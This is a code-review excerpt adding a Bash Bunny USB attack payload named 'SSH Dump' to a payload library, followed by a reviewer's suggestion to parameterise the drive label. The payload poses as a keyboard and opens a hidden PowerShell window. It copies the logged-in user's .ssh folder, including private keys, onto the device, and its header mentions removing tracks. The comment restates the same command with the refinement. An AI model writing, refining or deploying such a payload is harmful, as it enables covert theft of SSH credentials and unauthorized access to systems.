payloads/library/credentials/SSH Grab/payload.txt

```diff
@@ -0,0 +1,51 @@
+# Title: SSH Dump
+# Author: Tarllark
+# Version: 1.0
+# Target: Windows OS
+#
+# Copies the .ssh folder content of a logged in users account to loot/sshDump on the bashbunny
+#
+# Red Blinking..........Running
+# Blue Blinking.........Removing tracks
+# Green.................Finished
+################################################
+
+# Create directory under loot to store passwords in
+mkdir -p /root/udisk/loot/sshDump
+
+ATTACKMODE HID STORAGE
+
+LED R 200
+
+# Open CMD through Run Console
+Q GUI r
+Q DELAY 500
+Q STRING powershell -WindowStyle Hidden \$bunny\=\(gwmi win32_volume -f \'label=\\\"BashBunny\\\"\'\).NAME\; Copy-Item \$env:windir\\..\\Users\\\$env:UserName\\.ssh\\* \$bunny\\loot\\sshDump
```

Comment:
I would recommend using a variable assignment for the drive label as not everyone's configuration will have the default `BashBunny`  drive label. This makes user configuration much easier. 

You can do this by adding it to the top of your payload. For example with line: 
```
DRIVE_LABEL="BashBunny"
Q STRING powershell -WindowStyle Hidden \$bunny\=\(gwmi win32_volume -f \'label=\\\"$DRIVE_LABEL\\\"\'\).NAME\; Copy-Item \$env:windir\\..\\Users\\\$env:UserName\\.ssh\\* \$bunny\\loot\\sshDump
```